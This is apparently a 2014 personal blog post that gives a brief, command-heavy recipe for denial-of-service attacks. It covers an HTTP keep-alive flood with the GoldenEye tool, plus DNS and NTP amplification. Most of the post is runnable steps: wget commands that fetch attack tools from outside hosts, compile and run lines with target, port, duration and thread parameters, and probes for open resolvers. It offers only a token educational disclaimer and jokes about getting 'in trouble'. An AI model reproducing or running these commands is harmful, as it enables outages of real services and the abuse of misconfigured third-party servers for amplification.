Friday, 21 February 2014

DDoS / DoS / amplification attacks ++

1st post in 2014... finally! After 8 or so months of looking at the screen I managed to remember how to use my keyboard... and what more trendy and appropriate than a tribute to DoS attacks :) so go on! Get yourselves in trouble! (please dont!) DISCLAIMER: All information here is for educational purposes, may the Force be with you!

Russia's dirty secret (Golden eye):

Attack Vector exploited: HTTP Keep Alive + NoCache

wget https://raw.github.com/jseidl/GoldenEye/master/goldeneye.py

python goldeneye.py http://192.168.1.10 -w 10 -s 6 -m random

(thats the light-handed approach...)

DNS Amplification attack:

Well documented attack taking advantage of UDP packet spoofing and miss-configured DNS servers

How to test:
dig ANY isc.org @x.x.x.x
Where to test:
http://openresolverproject.org/

The tool (good old packetstorm):
wget http://packetstorm.foofus.com/DoS/dns_spquery.c.gz
gunzip dns_spquery.c.gz
gcc dns_spquery.c -o dns_spquery

./dns_spquery <target_ip> <dns_to_use> <some_fqdn_to_resolve>

NTP Amplification attack:

Well documented attack taking advantage of UDP packet spoofing and miss-configured NTP servers

How to test:
ntpdc -c monlist <target_ntp_server>
or
nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target_ntp_server>
(script available here http://nmap.org/svn/scripts/ntp-monlist.nse)
Where to test:
http://openntpproject.org/

The tool:
wget https://gist.githubusercontent.com/anonymous/d3abecdf9e828b3b7c37/raw/efe9154d88c67e2a1775a2f58cf2396ccc1e463d/gistfile1.pl
perl gistfile1.pl <target_IP> <src_port> <duration_in_sec> <list_file_name> <packet_payload_repetition??> <thread_number>

so that would be
perl gistfile1.pl 192.168.1.1 53 60 list.txt 2 10
or something similar...


Stay tuned for more..